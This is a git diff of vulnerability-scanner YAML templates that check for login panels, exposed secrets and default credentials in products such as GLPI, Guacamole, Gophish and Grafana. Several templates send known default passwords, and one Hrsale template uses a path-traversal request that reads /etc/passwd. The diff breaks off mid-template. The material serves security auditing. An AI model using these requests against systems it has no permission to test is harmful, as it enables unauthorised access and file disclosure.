gloo-unauth + info: name: Unauthenticated Gloo UI author: dhiyaneshDk severity: high + metadata: + max-request: 1 tags: unauth,gloo -requests: + +http: - method: GET path: - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' + headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-type: "application/grpc-web+proto" Referer: "{{BaseURL}}/admin/" + matchers-condition: and matchers: - type: word words: - "gke-remote" part: body + - type: word words: - "application/grpc-web+proto" part: header + - type: status status: - 200 + +# digest: 490a00463044022038a63398e0213e8c14e3835e8719afa5d37310c49f3d229fd3f4ee36af7972c202201810220865a8a667e649b44d48815c274a522cd21e532e7c5122f176b65d5541:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/glpi-authentication-7730.yaml b/poc/auth/glpi-authentication-7730.yaml deleted file mode 100644 index 96d6634fba..0000000000 --- a/poc/auth/glpi-authentication-7730.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: glpi-authentication - -info: - name: GLPI - Authentication - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"GLPI - Authentication" - tags: panel,auth,glpi - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - '<title>GLPI - Authentication' - - 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright' - - - type: status - status: - - 200 diff --git a/poc/auth/glpi-default-login-7732.yaml b/poc/auth/glpi-default-login-7732.yaml index f47f8cd39f..e411c10039 100644 --- a/poc/auth/glpi-default-login-7732.yaml +++ b/poc/auth/glpi-default-login-7732.yaml @@ -1,5 +1,4 @@ id: glpi-default-login - info: name: GLPI Default Login author: andysvints @@ -9,11 +8,8 @@ info: - https://glpi-project.org/ classification: cwe-id: CWE-798 - metadata: - max-request: 2 tags: glpi,default-login - -http: +requests: - raw: - | GET / HTTP/1.1 @@ -26,14 +22,12 @@ http: Referer: {{BaseURL}} {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - attack: pitchfork payloads: user: - glpi pass: - glpi - extractors: - type: regex name: token @@ -42,7 +36,6 @@ http: group: 1 regex: - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" - - type: regex name: name part: body @@ -50,7 +43,6 @@ http: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - - type: regex name: password part: body @@ -58,15 +50,14 @@ http: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - + cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' - - type: status status: - 200 -# digest: 4a0a004730450220756b6e508614433a3afccdcb206aec79b10478a9a3d45b32fc7ec1f2041d35fc022100adb763989b06d6b42d49bd02003348f3b6412a27b13f2cadbd999770d03eeef2:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/glpi-default-login.yaml b/poc/auth/glpi-default-login.yaml new file mode 100644 index 0000000000..c2ea4c26d7 --- /dev/null +++ b/poc/auth/glpi-default-login.yaml @@ -0,0 +1,67 @@ +id: glpi-default-login + +info: + name: GLPI Default Login + author: andysvints + severity: high + tags: glpi,default-login + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. + reference: https://glpi-project.org/ + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /front/login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} + + attack: pitchfork + payloads: + user: + - glpi + pass: + - glpi + + extractors: + - type: regex + name: token + part: body + internal: true + group: 1 + regex: + - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" + + - type: regex + name: name + part: body + internal: true + group: 1 + regex: + - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" + + - type: regex + name: password + part: body + internal: true + group: 1 + regex: + - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - 'GLPI - Standard Interface' + + - type: status + status: + - 200 diff --git a/poc/auth/gmail-api-client-secrets-7741.yaml b/poc/auth/gmail-api-client-secrets-7741.yaml deleted file mode 100644 index 72f7d06ecc..0000000000 --- a/poc/auth/gmail-api-client-secrets-7741.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: gmail-api-client-secrets - -info: - name: GMail API - Detect - author: geeknik - severity: info - description: GMail API was detected. - reference: https://developers.google.com/gmail/api/auth/web-server - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/client_secrets.json" - - matchers-condition: and - matchers: - - type: word - words: - - "client_id" - - "auth_uri" - - "token_uri" - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - -# digest: 4a0a00473045022100e423f2d50edff69e6eb1b5bc47e8f482b97de447024a3623818e28a08199321a02207f96b638e3b21026d86306511d783491c0cc00d9484b54499fe7cfea40baead3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gocd-encryption-key.yaml b/poc/auth/gocd-encryption-key.yaml index 80d0ed8b6b..6674be53bf 100644 --- a/poc/auth/gocd-encryption-key.yaml +++ b/poc/auth/gocd-encryption-key.yaml @@ -8,18 +8,18 @@ info: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,gocd,exposure,misconfig metadata: + max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + tags: go,gocd,exposure,misconfig -requests: +http: - method: GET path: - "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes" matchers-condition: and matchers: - - type: status status: - 200 @@ -37,3 +37,5 @@ requests: - type: regex regex: - "([a-z0-9]){32}" + +# digest: 4a0a0047304502207a374f4a3d53295089b3f257924253bb945aa90f49139de42d8595900d58d4d002210096aec8d919f4c6ce4fdcf29c487409d9091a7fe7d990df2d4954ee040f056bcf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/google-api-key-7768.yaml b/poc/auth/google-api-key-7768.yaml index 87d61eaa24..1d863c0dbe 100644 --- a/poc/auth/google-api-key-7768.yaml +++ b/poc/auth/google-api-key-7768.yaml @@ -1,23 +1,16 @@ id: google-api-key - info: name: Google API Key author: Swissky severity: info - metadata: - max-request: 2 tags: exposure,token,google - -http: +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/hopfully404" - extractors: - type: regex part: body regex: - "AIza[0-9A-Za-z\\-_]{35}" - -# digest: 4a0a004730450221008529a1cf21d244ce3327f73d3d68a4e1afc76d0dab02130fa43f449db87fb51802200b6b4d64369e56d8ebba8796e30b0cee88ca1318014c35dee345905fffdb4a3c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/google-earth-dlogin-7781.yaml b/poc/auth/google-earth-dlogin-7781.yaml new file mode 100644 index 0000000000..37152d2e45 --- /dev/null +++ b/poc/auth/google-earth-dlogin-7781.yaml @@ -0,0 +1,31 @@ +id: google-earth-dlogin +info: + name: Google Earth Enterprise Default Login + author: orpheus,johnjhacking + severity: high + tags: default-login,google + reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + metadata: + shodan-dork: 'title:"GEE Server"' +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork + payloads: + username: + - geapacheuser + password: + - geeadmin + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - 'DashboardPanel' + - 'Earth Enterprise Server' diff --git a/poc/auth/google-earth-dlogin.yaml b/poc/auth/google-earth-dlogin.yaml index 37152d2e45..7b88681c7f 100644 --- a/poc/auth/google-earth-dlogin.yaml +++ b/poc/auth/google-earth-dlogin.yaml @@ -3,10 +3,19 @@ info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking severity: high - tags: default-login,google - reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + description: Google Earth Enterprise default login credentials were discovered. + remediation: "To reset the username and password: sudo /opt/google/gehttpd/bin/htpasswd -c /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" + tags: default-login,google-earth + reference: + - https://johnjhacking.com/blog/gee-exploitation/ + - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html metadata: - shodan-dork: 'title:"GEE Server"' + shodan-query: 'title:"GEE Server"' + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -29,3 +38,5 @@ requests: words: - 'DashboardPanel' - 'Earth Enterprise Server' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/facebook-secrets.yaml b/poc/auth/google-secrets.yaml similarity index 100% rename from poc/auth/facebook-secrets.yaml rename to poc/auth/google-secrets.yaml diff --git a/poc/auth/gophish-default-login-7792.yaml b/poc/auth/gophish-default-login-7792.yaml index 9b2b924bb1..51c95010f1 100644 --- a/poc/auth/gophish-default-login-7792.yaml +++ b/poc/auth/gophish-default-login-7792.yaml @@ -1,10 +1,18 @@ id: gophish-default-login info: - name: Gophish < v0.10.1 default credentials + name: Gophish < v0.10.1 Default Credentials author: arcc,dhiyaneshDK severity: high tags: gophish,default-login + description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. + reference: + - https://docs.getgophish.com/user-guide/getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: @@ -43,4 +51,6 @@ requests: - "contains(tolower(all_headers), 'location: /')" - "contains(tolower(all_headers), 'gophish')" - "status_code==302" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/gophish-default-login-7793.yaml b/poc/auth/gophish-default-login-7793.yaml index 2bea18c8ad..9b2b924bb1 100644 --- a/poc/auth/gophish-default-login-7793.yaml +++ b/poc/auth/gophish-default-login-7793.yaml @@ -1,33 +1,31 @@ id: gophish-default-login + info: - name: Gophish < v0.10.1 Default Credentials + name: Gophish < v0.10.1 default credentials author: arcc,dhiyaneshDK severity: high - description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. - reference: - - https://docs.getgophish.com/user-guide/getting-started - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: gophish,default-login + requests: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} + - | POST /login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}} + attack: pitchfork payloads: user: - admin pass: - gophish + cookie-reuse: true extractors: - type: regex @@ -37,6 +35,7 @@ requests: group: 1 regex: - 'name="csrf_token" value="(.+?)"' + matchers: - type: dsl dsl: @@ -44,6 +43,4 @@ requests: - "contains(tolower(all_headers), 'location: /')" - "contains(tolower(all_headers), 'gophish')" - "status_code==302" - condition: and - -# Enhanced by mp on 2022/03/10 + condition: and \ No newline at end of file diff --git a/poc/auth/gophish-login-7795.yaml b/poc/auth/gophish-login-7795.yaml deleted file mode 100644 index bedbfc9976..0000000000 --- a/poc/auth/gophish-login-7795.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: gophish-login -info: - name: Gophish Login - author: dhiyaneshDK - severity: info - tags: panel,gophish - metadata: - shodan-query: http.title:"Gophish - Login" -requests: - - method: GET - path: - - '{{BaseURL}}/login' - matchers-condition: and - matchers: - - type: word - words: - - 'Gophish - Login' - - type: status - status: - - 200 diff --git a/poc/auth/gophish-login-7796.yaml b/poc/auth/gophish-login-7796.yaml new file mode 100644 index 0000000000..e35d98a093 --- /dev/null +++ b/poc/auth/gophish-login-7796.yaml @@ -0,0 +1,23 @@ +id: gophish-login + +info: + name: Gophish Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Gophish - Login" + tags: panel,gophish + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + words: + - 'Gophish - Login' + - type: status + status: + - 200 diff --git a/poc/auth/grafana-public-signup-7814.yaml b/poc/auth/grafana-public-signup-7814.yaml new file mode 100644 index 0000000000..bfdeddc6ae --- /dev/null +++ b/poc/auth/grafana-public-signup-7814.yaml @@ -0,0 +1,30 @@ +id: grafana-public-signup +info: + name: Grafana Public Signup + author: pdteam + severity: medium + tags: grafana,intrusive +requests: + - raw: + - | + POST /api/user/signup/step2 HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + {"username":"nuclei_{{randstr}}","password":"{{randstr_1}}"} + matchers-condition: and + matchers: + - type: word + words: + - "User sign up completed successfully" + - type: word + words: + - "grafana_sess" + - "grafana_user" + condition: and + part: header + - type: status + status: + - 200 diff --git a/poc/auth/grafana-public-signup.yaml b/poc/auth/grafana-public-signup.yaml index 50139cdbdc..57e0bcc038 100644 --- a/poc/auth/grafana-public-signup.yaml +++ b/poc/auth/grafana-public-signup.yaml @@ -1,15 +1,10 @@ id: grafana-public-signup - info: name: Grafana Public Signup author: pdteam severity: medium - metadata: - max-request: 1 - shodan-query: title:"Grafana" - tags: grafana,intrusive,misconfig - -http: + tags: grafana,intrusive +requests: - raw: - | POST /api/user/signup/step2 HTTP/1.1 @@ -19,22 +14,17 @@ http: Referer: {{BaseURL}} {"username":"{{randstr}}","password":"{{randstr_1}}"} - matchers-condition: and matchers: - type: word words: - "User sign up completed successfully" - - type: word words: - "grafana_sess" - "grafana_user" condition: and part: header - - type: status status: - 200 - -# digest: 4a0a004730450221008d17e057471dcda3505467d05d41aa5c32db96f2146ca1c43f7a88beae3584c002207709b004fd68285d4ffa9bfb6ea1af8301a483730ea986f3b7ee046ed8301eed:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/guacamole-default-login-7858.yaml b/poc/auth/guacamole-default-login-7858.yaml index 9f657da78c..98f19dbabb 100644 --- a/poc/auth/guacamole-default-login-7858.yaml +++ b/poc/auth/guacamole-default-login-7858.yaml @@ -4,16 +4,18 @@ info: name: Guacamole Default Login author: r3dg33k severity: high - tags: guacamole,default-login description: Guacamole default admin login credentials were detected. - reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 + reference: + - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - cve-id: cwe-id: CWE-522 + metadata: + max-request: 1 + tags: guacamole,default-login -requests: +http: - raw: - | POST /api/tokens HTTP/1.1 @@ -49,4 +51,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/03/10 +# digest: 4a0a00473045022017cbd9a577da9580b25601a92ca12140aba01cfa155139b4b528662bc2683310022100b8847255257f8cfbb5b9ff4b8dbdf20108a739013991804e002d822b45589c6b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/guacamole-default-login-7859.yaml b/poc/auth/guacamole-default-login-7859.yaml new file mode 100644 index 0000000000..4a296c20ba --- /dev/null +++ b/poc/auth/guacamole-default-login-7859.yaml @@ -0,0 +1,38 @@ +id: guacamole-default-login +info: + name: Guacamole Default Login + author: r3dg33k + severity: high + tags: guacamole,default-login + reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. +requests: + - raw: + - | + POST /api/tokens HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{Hostname}} + Referer: {{Hostname}} + + username={{username}}&password={{password}} + payloads: + username: + - guacadmin + password: + - guacadmin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"username"' + - '"authToken"' + - '"guacadmin"' + condition: and + - type: word + words: + - 'application/json' + part: header + - type: status + status: + - 200 diff --git a/poc/auth/guacamole-default-login-7861.yaml b/poc/auth/guacamole-default-login-7861.yaml index 4a296c20ba..8517bac93a 100644 --- a/poc/auth/guacamole-default-login-7861.yaml +++ b/poc/auth/guacamole-default-login-7861.yaml @@ -3,8 +3,14 @@ info: name: Guacamole Default Login author: r3dg33k severity: high + description: Guacamole default admin login credentials were detected. + reference: + - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: guacamole,default-login - reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22. requests: - raw: - | @@ -36,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/hivemanager-login-panel-7966.yaml b/poc/auth/hivemanager-login-panel-7966.yaml index 6dd5bdedc9..a4da86dd2b 100644 --- a/poc/auth/hivemanager-login-panel-7966.yaml +++ b/poc/auth/hivemanager-login-panel-7966.yaml @@ -1,10 +1,9 @@ id: hivemanager-login-panel - info: name: HiveManager Login panel author: binaryfigments severity: info - tags: panel,hivemanager,login + tags: panel requests: - method: GET diff --git a/poc/auth/hongdian-default-login-7997.yaml b/poc/auth/hongdian-default-login-7997.yaml new file mode 100644 index 0000000000..1ca17e5a22 --- /dev/null +++ b/poc/auth/hongdian-default-login-7997.yaml @@ -0,0 +1,58 @@ +id: hongdian-default-login + +info: + name: Hongdian Default Login + author: gy741 + severity: high + description: Hongdian default login information was detected. + tags: hongdian,default-login + reference: + - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + + payloads: + username: + - guest + - admin + password: + - guest + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + words: + - "text/html" + part: header + + - type: word + words: + - "status_main.cgi" + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/hongdian-default-login-7999.yaml b/poc/auth/hongdian-default-login-7999.yaml deleted file mode 100644 index 5a07adb98f..0000000000 --- a/poc/auth/hongdian-default-login-7999.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: hongdian-default-login -info: - name: Hongdian Default Login - author: gy741 - severity: high - description: Hongdian default login information was detected. - reference: - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: hongdian,default-login -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - payloads: - username: - - guest - - admin - password: - - guest - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - "text/html" - part: header - - type: word - words: - - "status_main.cgi" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/hp-ilo-serial-key-disclosure-8023.yaml b/poc/auth/hp-ilo-serial-key-disclosure-8023.yaml deleted file mode 100644 index 61bddf3680..0000000000 --- a/poc/auth/hp-ilo-serial-key-disclosure-8023.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: hp-ilo-serial-key-disclosure -info: - name: HP ILO Serial Key Disclosure - author: dhiyaneshDk - severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json - tags: exposure,config -requests: - - method: GET - path: - - "{{BaseURL}}/xmldata?item=CpqKey" - matchers-condition: and - matchers: - - type: word - words: - - "LTYPE" - - "LNAME" - - "KEY" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/hp-ilo-serial-key-disclosure-8025.yaml b/poc/auth/hp-ilo-serial-key-disclosure-8025.yaml new file mode 100644 index 0000000000..60989a2210 --- /dev/null +++ b/poc/auth/hp-ilo-serial-key-disclosure-8025.yaml @@ -0,0 +1,27 @@ +id: hp-ilo-serial-key-disclosure + +info: + name: HP ILO Serial Key Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/xmldata?item=CpqKey" + + matchers-condition: and + matchers: + - type: word + words: + - "LTYPE" + - "LNAME" + - "KEY" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/hp-ilo-serial-key-disclosure.yaml b/poc/auth/hp-ilo-serial-key-disclosure.yaml index 60989a2210..61bddf3680 100644 --- a/poc/auth/hp-ilo-serial-key-disclosure.yaml +++ b/poc/auth/hp-ilo-serial-key-disclosure.yaml @@ -1,17 +1,15 @@ id: hp-ilo-serial-key-disclosure - info: name: HP ILO Serial Key Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/hp-ilo-serial-key-disclosure.json tags: exposure,config - requests: - method: GET path: - "{{BaseURL}}/xmldata?item=CpqKey" - matchers-condition: and matchers: - type: word @@ -21,7 +19,6 @@ requests: - "KEY" part: body condition: and - - type: status status: - 200 diff --git a/poc/auth/hpe-system-management-login-8017.yaml b/poc/auth/hpe-system-management-login-8017.yaml new file mode 100644 index 0000000000..2d004eb29d --- /dev/null +++ b/poc/auth/hpe-system-management-login-8017.yaml @@ -0,0 +1,27 @@ +id: hpe-system-management-login + +info: + name: HPE System Management Login + author: divya_mudgal + severity: info + tags: hpe,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cpqlogin.htm" + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - "HPE System Management Homepage" + - "/proxy/ssllogin" + + extractors: + - type: regex + part: body + regex: + - "HPE System Management Homepage v([0-9-.]*)" diff --git a/poc/auth/hpe-system-management-login.yaml b/poc/auth/hpe-system-management-login.yaml index 2d004eb29d..121d8ea019 100644 --- a/poc/auth/hpe-system-management-login.yaml +++ b/poc/auth/hpe-system-management-login.yaml @@ -1,12 +1,19 @@ id: hpe-system-management-login info: - name: HPE System Management Login + name: Hewlett Packard Enterprise System Management Login Panel - Detect author: divya_mudgal severity: info + description: Hewlett Packard Enterprise System Management login page was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: hpe,tech,panel -requests: +http: - method: GET path: - "{{BaseURL}}/cpqlogin.htm" @@ -25,3 +32,5 @@ requests: part: body regex: - "HPE System Management Homepage v([0-9-.]*)" + +# digest: 4a0a004730450221008648c60f77f9fa87ed068d9cdd3c2d6459a018e00679356f649dd00438673fe202207b6a8884b30e6e4df0db104e9306c0326edaf21a5d6af32afb5797a8c969e6ad:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/hrsale-unauthenticated-lfi-8039.yaml b/poc/auth/hrsale-unauthenticated-lfi-8039.yaml index ab6e547134..c30bf2123a 100644 --- a/poc/auth/hrsale-unauthenticated-lfi-8039.yaml +++ b/poc/auth/hrsale-unauthenticated-lfi-8039.yaml @@ -1,33 +1,20 @@ id: hrsale-unauthenticated-lfi - info: - name: Hrsale 2.0.0 - Local File Inclusion + name: Hrsale 2.0.0 - Hrsale Unauthenticated Lfi author: 0x_Akoko severity: high - description: Hrsale 2.0.0 is vulnerable to local file inclusion. This exploit allow you to download any readable file from server without permission and login session - reference: - - https://www.exploit-db.com/exploits/48920 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - max-request: 1 - tags: hrsale,lfi,edb - -http: + description: This exploit allow you to download any readable file from server without permission and login session + reference: https://www.exploit-db.com/exploits/48920 + tags: hrsale,lfi +requests: - method: GET path: - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 - -# digest: 4a0a0047304502205d8da26caa1f9a6e6bed6ce5438954cd3ae937fa03b8cebf06f5ae4b9b3107c70221008d7fff0fdaa8d82a6706618fcf4b82ae6e5b708d220e5516d0f3a7f2481969e3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/hrsale-unauthenticated-lfi-8041.yaml b/poc/auth/hrsale-unauthenticated-lfi-8041.yaml index d335ea1fcf..ab6e547134 100644 --- a/poc/auth/hrsale-unauthenticated-lfi-8041.yaml +++ b/poc/auth/hrsale-unauthenticated-lfi-8041.yaml @@ -11,16 +11,17 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: hrsale,lfi + metadata: + max-request: 1 + tags: hrsale,lfi,edb -requests: +http: - method: GET path: - "{{BaseURL}}/download?type=files&filename=../../../../../../../../etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -29,4 +30,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/08/03 +# digest: 4a0a0047304502205d8da26caa1f9a6e6bed6ce5438954cd3ae937fa03b8cebf06f5ae4b9b3107c70221008d7fff0fdaa8d82a6706618fcf4b82ae6e5b708d220e5516d0f3a7f2481969e3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/htpasswd-detection-8046.yaml b/poc/auth/htpasswd-detection-8046.yaml new file mode 100644 index 0000000000..e3ac389f7e --- /dev/null +++ b/poc/auth/htpasswd-detection-8046.yaml @@ -0,0 +1,25 @@ +id: htpasswd + +info: + name: Detect exposed .htpasswd files + author: geeknik + severity: info + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.htpasswd" + + matchers-condition: and + matchers: + - type: word + words: + - ":{SHA}" + - ":$apr1$" + - ":$2y$" + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml b/poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml deleted file mode 100644 index 1c523c0a06..0000000000 --- a/poc/auth/http-etcd-unauthenticated-api-data-leak-8056.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: http-etcd-unauthenticated-api-data-leak -info: - name: etcd Unauthenticated HTTP API Leak - author: dhiyaneshDk - severity: high - reference: https://hackerone.com/reports/1088429 - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and - matchers: - - type: word - words: - - '"roles"' - - '"permissions"' - - '"role"' - - '"kv"' - condition: and - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - "text/plain" diff --git a/poc/auth/http-etcd-unauthenticated-api-data-leak.yaml b/poc/auth/http-etcd-unauthenticated-api-data-leak.yaml new file mode 100644 index 0000000000..ba35991570 --- /dev/null +++ b/poc/auth/http-etcd-unauthenticated-api-data-leak.yaml @@ -0,0 +1,38 @@ +id: http-etcd-unauthenticated-api-data-leak + +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + tags: unauth + +requests: + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: + - | + GET /v2/auth/roles HTTP/1.1 + Host: {{Subdomains}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + matchers-condition: and + matchers: + - type: word 